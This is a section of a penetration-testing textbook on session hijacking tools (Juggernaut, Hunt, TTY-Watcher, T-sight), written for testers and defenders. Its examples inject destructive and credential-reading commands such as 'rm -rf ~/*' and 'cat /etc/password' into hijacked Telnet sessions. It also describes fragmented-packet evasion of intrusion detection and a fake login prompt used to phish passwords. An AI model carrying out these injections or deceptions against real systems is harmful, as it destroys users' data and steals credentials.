Penetration Testing and Network Defense
< Day Day Up > |
Now that you have learned about the theory behind session hijacking, it is time to learn about a few tools used in session hijacking attacks. This section discusses the following tools:
Juggernaut
Juggernaut, like most of the session hijacking tools, is a Linux based tool. This tool was created by someone with the handle of 'route' and was first introduced in volume 7, issue 50 of Phrack Magazine. You can view this posting, which includes the source code, at http://www.phrack.org/show.php?p=50&a=6. Juggernaut is an older tool, yet it is still popular for some of its unique features. One of the features that makes Juggernaut a popular tool is its capability to watch all traffic or watch traffic for a particular keyword (such as password). The malicious hacker or penetration tester can watch all sessions and pick the session that he or she wants to hijack. Another benefit of Juggernaut is the included option of performing the traditional interactive session hijack or a simplex connection hijack. A simplex hijack is also called a simple hijack by many tools. A simplex hijack allows you to inject a single command into a Telnet stream. This command can be something like cat /etc/password/ to grab password information from a Linux host. Doing a few single commands is less noticeable than a full session hijack, increasing the chances that your attack will go unnoticed. The final benefit of Juggernaut is its built-in function of packet assembly. This enables you to create your own packet with header flags set any way you like. This is an advanced feature of Juggernaut that becomes useful in unique situations such as when you want to create a custom packet that is fragmented into multiple segments. Some intrusion detection systems (IDSs) and firewalls do not track fragmented packets, so you can use this option to create customized packets to bypass some security devices. When you launch Juggernaut from a Linux command line, you see the menu in Example 6-1. Example 6-1. Juggernaut Menu
Juggernaut ?) Help 0) Program information 1) Connection database 2) Spy on a connection 3) Reset a connection 4) Automated connection reset daemon 5) Simplex connection hijack 6) Interactive connection hijack 7) Packet assembly module 8) Souper sekret option number eight 9) Step down
The connection database option (1) shows you active sessions. Note that in a switched environment, you cannot see sessions unless you have configured port monitoring on the switch. In Example 6-2, you can see that two Telnet sessions (destination TCP port 23) are open to 10.18.12.15. You can spy on the connection with option 2. This allows you to monitor all activity between two hosts. You also have the option to log the traffic to a file. By default, no logging is performed. Example 6-2. Using Juggernaut to View Active Telnet Sessions
Current Connection Database: ------------------------------------------ ref # source target (1) 10.18.12.99 [1033] 10.18.12.15 [23] (2) 10.18.12.15 [1241] 10.18.12.15 [23] Choose a connection [q] >1 Do you wish to log to a file as well? [y/N] >y Spying on connection, hit 'ctrl-c' when done. Spying on connection: 10.18.12.99 [1033] --> 10.18.12.15 [23] /$cd ~/Documents /home/Dayna/Documents$ls 1stQrtrReport.doc Payroll.xls $ One of the drawbacks to Juggernaut is that no passwords are sent from the monitored host to your computer. You can use another packet sniffer of your choosing (such as Ethereal) to view this information. To perform a simple hijack, choose option 5, which enables you to enter a single command to the target. This is the safest option to prevent you from being detected. Example 6-3 shows a command that erases all files in the home directory of the user after you choose the connection. Example 6-3. Simplex Hijack: Executing a Single Command on a Target
Choose a connection [q] >1 Enter the command string you wish executed [q] > rm -rf ~/* Spying on connection, hit 'ctrl-c' when you want to hijack. NOTE: This may cause an ACK storm until client is RST. Spying on connection: 10.18.12.99 [1033] --> 10.18.12.15 [23] Following is a description of the other options available with Juggernaut:
Hunt
Hunt, created by Pavel Krauz and available at http://packetstorm.linuxsecurity.com/sniffers/hunt/, has many similarities to Juggernaut. Like Juggernaut, it runs on Linux, enables you to watch all TCP traffic, and gives you the option of doing a simple session hijack or a simple hijack. One of the advantages of Hunt over Juggernaut is its capability to reset connections after you are done with the hijack. You can return control to the originating host which, if done soon enough, can make the session go completely unnoticed by the host and target. Juggernaut, on the other hand, requires you to perform a DoS attack on the host. That attack not only drops the connection to the target, but it also prevents all communication of the host on the network. This in turn alerts the user to contact the help desk, raising suspicion of a possible attack. By returning control to the host, Hunt avoids this problem by making the temporary loss of communication to the target a network "glitch" that others quickly forget about. After you launch Hunt, you see the menu in Example 6-4. Example 6-4. Hunt Menu
l/w/r) list/watch/reset connections u) host up tests a) arp/simple hijack (avoids ack storm if arp is used) s) simple hijack d) daemons rst/arp/sniff/mac o) options x) exit *>
The selections do the following:
Example 6-5 shows a hijack of an active Telnet session. Example 6-5. Using Hunt to Hijack an Active Telnet Session
/* * Hunt 1.0 * multipurpose connection intruder / sniffer for Linux * 1998 by kra - http://www.rootshell.com */ starting hunt ---Main Menu---rcvpkt 0, free/alloc pkt 63/64. l/w/r) list/watch/reset connections u) host up a) arp/simple hijack (avoids ack storm if arp used) s) simple hijack d) daemons rst/arp/sniff/mac o) options x) exit - [ http://www.rootshell.com/ ] - > a 0) 10.12.18.99 [1421] --> 10.12.18.15[23] 1) 10.12.18.134 [1049] --> 10.12.18.15 [23] choose conn> 0 arp spoof src in dst y/n [y]> y src MAC [EA:1A:DE:AD:BE:03]> dst MAC [EA:1A:DE:AD:BE:04]> dump connection y/n [y]>n press key to take over connection CTRL-] to break rm -rf ~/* [r]reset connection/[s]ynchronize/[n]one [r]> s user have to type 12 characters and print 29 characters to synchronize connection CTRL-C to break Done
In this example, a simple hijack is performed against the 10.12.18.99 host as it connects to the 10.12.18.15 computer via Telnet (destination TCP port 23). Executing the rm rf ~/* command deletes all files in the home directory of that user. To properly synchronize the sequence numbers, Hunt might send a message to the user to type additional characters to pad the communication with additional bytes. In the output given from Example 6-5, the user is prompted to type 12 characters with the following message: msg from root: power failure - try to type 12 chars This is one of the major drawbacks to Hunt because most UNIX and Linux users would recognize this as abnormal behavior and report it to their administrator. Their administrator (after reading this book) would know that this message was sent by Hunt and would begin investigating the source of the attack. Still, some Linux and UNIX users might not think much of this message and would do as it says, padding the data so that the sequence numbers stay synchronized. TTY-Watcher
TTY-Watcher (available at http://www.engarde.com/software/) is different from Hunt and Juggernaut in that it monitors and hijacks sessions on a single system. At press time, TTY-Watcher works only on Sun Solaris systems. When users are connected to the Solaris system, all data from their Terminal Type (TTY) session is copied over to your TTY window. Figure 6-4 shows this process. Figure 6-4. TTY-Watcher Operation
TTY-Watcher also has the option of sending a message to the user. The message could be something like this: Your connection has logged out. Please enter your password again. Login:
Of course, when the user enters this at the command line, he receives an error because his original TTY application interprets his password as a command. This is only an example of what can happen with the send feature; the possibilities are limited only by your imagination. T-Sight
T-sight is a commercial tool developed by Engarde (http://www.engarde.com/software/) that runs on Windows platforms. T-sight was originally designed as a security tool to monitor your network for suspicious activity. All communication is copied in real-time, giving you accurate output of data being transmitted on your network. However, in the process of monitoring, you can hijack the session. Because of this intrusive option, Engarde licenses its software only to predetermined IP addresses. You can view a tutorial of T-sight at http://www.engarde.com/software/t-sight/tutorial/realtime/index.php. Other Tools
The tools mentioned in this chapter are only a sample of software and code available to perform session hijacking. Other tools include the following:
|
< Day Day Up > |